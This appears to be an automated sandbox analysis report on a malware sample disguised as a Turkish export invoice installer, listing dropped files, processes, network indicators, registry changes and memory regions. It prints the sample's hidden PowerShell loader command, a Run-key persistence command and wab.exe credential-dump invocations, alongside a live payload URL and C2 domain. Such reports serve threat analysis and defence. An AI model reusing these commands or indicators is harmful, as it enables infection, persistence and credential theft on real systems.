Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714
1633.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Recepternes.pen
|
ASCII text, with very long lines (59011), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aleldatf.a30.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkbyftgc.hqk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv9082.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x9f59b020, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\spcglopa
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
modified
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\Slumretppe.hor
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\UMMAN #U0130HRACAT AFR5641 910-1714
1633.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\bouillonterningens.skk
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Butterine\Varemaerke\Garuda\nondeferential.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Grouchy.Opl
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Holomorph196.mil
|
BS image, Version -29696, Quantization -30208, (Decompresses to 153 words)
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe
|
"C:\Users\user\Desktop\UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Escrow=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Vitaminerne\Taksonomiske24\Trephining\Piloters\Recepternes.pen';$Unreverberating=$Escrow.SubString(58974,3);.$Unreverberating($Escrow)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ
/d "%Paaskelrdag% -windowstyle minimized $Sisies=(Get-ItemProperty -Path 'HKCU:\Jomfruburenes192\').Minnesingers;%Paaskelrdag%
($Sisies)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\spcglopa"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vjhqmgaczjl"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\feujmrlwnrdrjm"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Paaskelrdag% -windowstyle
minimized $Sisies=(Get-ItemProperty -Path 'HKCU:\Jomfruburenes192\').Minnesingers;%Paaskelrdag% ($Sisies)"
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://geoplugin.net/json.gpj
|
unknown
|
||
|
http://geoplugin.net/json.gpp
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://ricohltd.top/-T
|
unknown
|
||
|
http://geoplugin.net/json.gps
|
unknown
|
||
|
http://www.imvu.comppData
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
http://geoplugin.net/json.gp9
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://ricohltd.top/
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://geoplugin.net/json.gpB
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.bineT
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
http://geoplugin.net/json.gpL
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.binPm
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://geoplugin.net/json.gpX
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.binobm
|
unknown
|
||
|
https://ricohltd.top/PIoDroeALMbPB243.bin
|
172.67.191.112
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
learfo55ozj01.duckdns.org
|
193.222.96.21
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
ricohltd.top
|
172.67.191.112
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.21
|
learfo55ozj01.duckdns.org
|
Germany
|
|
|
|
172.67.191.112
|
ricohltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shield79\Uninstall\mechanalize\Frederikke66
|
corticosteroid
|
||
|
HKEY_CURRENT_USER\SOFTWARE\valgresultatet\hellige
|
tilbagefrslen
|
||
|
HKEY_CURRENT_USER\Jomfruburenes192
|
Minnesingers
|
||
|
HKEY_CURRENT_USER\Environment
|
Paaskelrdag
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Startup key
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8C77000
|
direct allocation
|
page execute and read and write
|
|
|
|
2EC4000
|
heap
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
6FD0000
|
heap
|
page execute and read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
27D9000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
2FFD000
|
stack
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
2F30000
|
heap
|
page read and write
|
||
|
224C9000
|
heap
|
page read and write
|
||
|
8240000
|
direct allocation
|
page execute and read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
22332000
|
heap
|
page read and write
|
||
|
21F6D000
|
stack
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
81DE000
|
stack
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
6170000
|
heap
|
page read and write
|
||
|
30FE000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
6E7B000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
58B6000
|
trusted library allocation
|
page read and write
|
||
|
6178000
|
heap
|
page read and write
|
||
|
68A0000
|
direct allocation
|
page read and write
|
||
|
41C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
6FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EBE000
|
stack
|
page read and write
|
||
|
4C02000
|
heap
|
page read and write
|
||
|
328E000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BDB000
|
heap
|
page read and write
|
||
|
6470000
|
direct allocation
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
2390000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
4C14000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
501E000
|
stack
|
page read and write
|
||
|
40C9000
|
trusted library allocation
|
page read and write
|
||
|
7F30000
|
trusted library allocation
|
page read and write
|
||
|
6480000
|
direct allocation
|
page read and write
|
||
|
6EEE000
|
heap
|
page read and write
|
||
|
4BFF000
|
heap
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
2A60000
|
trusted library section
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
83F7000
|
trusted library allocation
|
page read and write
|
||
|
5719000
|
trusted library allocation
|
page read and write
|
||
|
32F0000
|
heap
|
page read and write
|
||
|
2BFB000
|
stack
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
4BCE000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
6430000
|
direct allocation
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
801000
|
heap
|
page read and write
|
||
|
6206000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
674E000
|
stack
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
6E4F000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
2BBC000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
40B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
32A0000
|
heap
|
page read and write
|
||
|
6200000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
6E89000
|
heap
|
page read and write
|
||
|
61F9000
|
heap
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
9AF000
|
stack
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
6500000
|
direct allocation
|
page read and write
|
||
|
7C70000
|
heap
|
page read and write
|
||
|
A077000
|
direct allocation
|
page execute and read and write
|
||
|
287E000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
64F0000
|
direct allocation
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
21B20000
|
direct allocation
|
page read and write
|
||
|
7DB2000
|
heap
|
page read and write
|
||
|
4CAA000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
7F800000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BBC000
|
stack
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
223AC000
|
heap
|
page read and write
|
||
|
7B77000
|
stack
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
4BD6000
|
heap
|
page read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
224D1000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2A70000
|
trusted library section
|
page read and write
|
||
|
4BCC000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
6990000
|
heap
|
page read and write
|
||
|
64D0000
|
direct allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
40BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6245000
|
heap
|
page read and write
|
||
|
4BCB000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
29CB000
|
heap
|
page read and write
|
||
|
2860000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
222BA000
|
heap
|
page read and write
|
||
|
22840000
|
unclassified section
|
page execute and read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
4BD7000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
32CF000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
32F7000
|
heap
|
page read and write
|
||
|
58A3000
|
trusted library allocation
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
23F6000
|
heap
|
page read and write
|
||
|
4C39000
|
heap
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
73E000
|
stack
|
page read and write
|
||
|
21EAE000
|
stack
|
page read and write
|
||
|
64A0000
|
direct allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
8000000
|
trusted library allocation
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
22440000
|
heap
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
60D0000
|
heap
|
page read and write
|
||
|
2340000
|
heap
|
page read and write
|
||
|
64B0000
|
direct allocation
|
page read and write
|
||
|
4C1B000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
5777000
|
trusted library allocation
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
354F000
|
stack
|
page read and write
|
||
|
6207000
|
heap
|
page read and write
|
||
|
6207000
|
heap
|
page read and write
|
||
|
41F0000
|
heap
|
page read and write
|
||
|
61FB000
|
heap
|
page read and write
|
||
|
21DAC000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2384000
|
heap
|
page read and write
|
||
|
5711000
|
trusted library allocation
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
6840000
|
direct allocation
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4A88000
|
heap
|
page read and write
|
||
|
22916000
|
unclassified section
|
page execute and read and write
|
||
|
64C0000
|
direct allocation
|
page read and write
|
||
|
6EE0F000
|
unkown
|
page readonly
|
||
|
4700000
|
heap
|
page read and write
|
||
|
6E1C000
|
heap
|
page read and write
|
||
|
AAF000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8250000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
7D70000
|
heap
|
page read and write
|
||
|
4BCE000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
3C70000
|
remote allocation
|
page execute and read and write
|
||
|
4BFF000
|
heap
|
page read and write
|
||
|
32FB000
|
heap
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
7CEA000
|
heap
|
page read and write
|
||
|
AA77000
|
direct allocation
|
page execute and read and write
|
||
|
4BCD000
|
heap
|
page read and write
|
||
|
4BFA000
|
heap
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
22DC000
|
stack
|
page read and write
|
||
|
64E0000
|
direct allocation
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page read and write
|
||
|
6204000
|
heap
|
page read and write
|
||
|
224E9000
|
heap
|
page read and write
|
||
|
4C1B000
|
heap
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
22930000
|
heap
|
page read and write
|
||
|
4BCE000
|
heap
|
page read and write
|
||
|
33FE000
|
stack
|
page read and write
|
||
|
4C2B000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
340F000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BF9000
|
heap
|
page read and write
|
||
|
2291C000
|
unclassified section
|
page execute and read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
22091000
|
direct allocation
|
page execute and read and write
|
||
|
22131000
|
heap
|
page read and write
|
||
|
6F20000
|
trusted library allocation
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
19A000
|
stack
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
32F9000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
220A6000
|
direct allocation
|
page execute and read and write
|
||
|
2BFE000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
619D000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
4BFB000
|
heap
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
5739000
|
trusted library allocation
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
819C000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BE3000
|
heap
|
page read and write
|
||
|
30F2000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
9677000
|
direct allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
310F000
|
heap
|
page read and write
|
||
|
6490000
|
direct allocation
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
2BCC000
|
stack
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
2BBF000
|
unkown
|
page read and write
|
||
|
304E000
|
stack
|
page read and write
|
||
|
224D2000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
71EB000
|
stack
|
page read and write
|
||
|
6F17000
|
trusted library allocation
|
page read and write
|
||
|
4BE5000
|
heap
|
page read and write
|
||
|
4C1A000
|
heap
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
4C39000
|
heap
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
6EE0D000
|
unkown
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
2EF0000
|
heap
|
page read and write
|
||
|
30BE000
|
unkown
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
4190000
|
heap
|
page readonly
|
||
|
228B3000
|
unclassified section
|
page execute and read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
32FA000
|
heap
|
page read and write
|
||
|
7C5E000
|
stack
|
page read and write
|
||
|
287F000
|
stack
|
page read and write
|
||
|
7F10000
|
trusted library allocation
|
page read and write
|
||
|
41A8000
|
trusted library allocation
|
page read and write
|
||
|
6830000
|
direct allocation
|
page read and write
|
||
|
224B9000
|
heap
|
page read and write
|
||
|
279D000
|
stack
|
page read and write
|
||
|
5E0000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
22240000
|
heap
|
page read and write
|
||
|
21DEE000
|
stack
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4BDE000
|
heap
|
page read and write
|
||
|
6520000
|
heap
|
page read and write
|
||
|
60E0000
|
heap
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
228E000
|
stack
|
page read and write
|
||
|
4C09000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
21EEC000
|
stack
|
page read and write
|
||
|
7B8000
|
heap
|
page read and write
|
||
|
6546000
|
heap
|
page read and write
|
||
|
27A0000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
61EB000
|
heap
|
page read and write
|
||
|
22441000
|
heap
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
6255000
|
heap
|
page read and write
|
||
|
6450000
|
direct allocation
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
50B4000
|
heap
|
page read and write
|
||
|
7CD4000
|
heap
|
page read and write
|
||
|
327C000
|
heap
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
6440000
|
direct allocation
|
page read and write
|
||
|
6EDF0000
|
unkown
|
page readonly
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
8010000
|
heap
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
34F0000
|
heap
|
page read and write
|
||
|
41F7000
|
heap
|
page read and write
|
||
|
297F000
|
stack
|
page read and write
|
||
|
414E000
|
stack
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
21B10000
|
direct allocation
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
21F2E000
|
stack
|
page read and write
|
||
|
41AF000
|
remote allocation
|
page execute and read and write
|
||
|
6E3F000
|
heap
|
page read and write
|
||
|
80DC000
|
stack
|
page read and write
|
||
|
6F40000
|
trusted library allocation
|
page read and write
|
||
|
60F5000
|
heap
|
page read and write
|
||
|
46A0000
|
heap
|
page execute and read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2207B000
|
unclassified section
|
page execute and read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
7CC0000
|
heap
|
page read and write
|
||
|
52AF000
|
stack
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
21BAF000
|
stack
|
page read and write
|
||
|
8B60000
|
direct allocation
|
page execute and read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
30E8000
|
heap
|
page read and write
|
||
|
224C8000
|
heap
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
4BD0000
|
heap
|
page read and write
|
||
|
224E9000
|
heap
|
page read and write
|
||
|
6460000
|
direct allocation
|
page read and write
|
||
|
32F9000
|
heap
|
page read and write
|
||
|
274E000
|
stack
|
page read and write
|
||
|
4BD8000
|
heap
|
page read and write
|
||
|
5DE000
|
stack
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
45BE000
|
stack
|
page read and write
|
||
|
21AF0000
|
direct allocation
|
page read and write
|
||
|
4BDE000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
6245000
|
heap
|
page read and write
|
||
|
21FAE000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
32CE000
|
unkown
|
page read and write
|
||
|
4BAF000
|
remote allocation
|
page execute and read and write
|
||
|
2289D000
|
unclassified section
|
page execute and read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
7E7000
|
heap
|
page read and write
|
||
|
6410000
|
direct allocation
|
page read and write
|
||
|
6850000
|
direct allocation
|
page read and write
|
||
|
6200000
|
heap
|
page read and write
|
||
|
4100000
|
trusted library allocation
|
page read and write
|
||
|
58BC000
|
trusted library allocation
|
page read and write
|
||
|
27A8000
|
heap
|
page read and write
|
||
|
35CF000
|
stack
|
page read and write
|
||
|
2A98000
|
heap
|
page read and write
|
||
|
40B4000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
21E2F000
|
stack
|
page read and write
|
||
|
2E3D000
|
stack
|
page read and write
|
||
|
3418000
|
heap
|
page read and write
|
||
|
45FE000
|
stack
|
page read and write
|
||
|
7F20000
|
trusted library allocation
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
4FE4000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4709000
|
heap
|
page read and write
|
||
|
60F0000
|
heap
|
page read and write
|
||
|
221A9000
|
heap
|
page read and write
|
||
|
6207000
|
heap
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
21B00000
|
direct allocation
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
4BC9000
|
heap
|
page read and write
|
||
|
2EC4000
|
heap
|
page read and write
|
||
|
4BC1000
|
heap
|
page read and write
|
||
|
6255000
|
heap
|
page read and write
|
||
|
4BCC000
|
heap
|
page read and write
|
||
|
4BD5000
|
heap
|
page read and write
|
||
|
22441000
|
heap
|
page read and write
|
||
|
4BF4000
|
heap
|
page read and write
|
||
|
2E34000
|
stack
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
6160000
|
direct allocation
|
page read and write
|
||
|
5430000
|
trusted library allocation
|
page read and write
|
||
|
6800000
|
heap
|
page execute and read and write
|
||
|
4BDE000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
40E5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2898000
|
heap
|
page read and write
|
||
|
50BF000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
6255000
|
heap
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
21CCE000
|
stack
|
page read and write
|
||
|
50B1000
|
heap
|
page read and write
|
||
|
2E80000
|
heap
|
page readonly
|
||
|
3D87000
|
remote allocation
|
page execute and read and write
|
||
|
2F34000
|
heap
|
page read and write
|
||
|
4BC8000
|
heap
|
page read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
21C90000
|
remote allocation
|
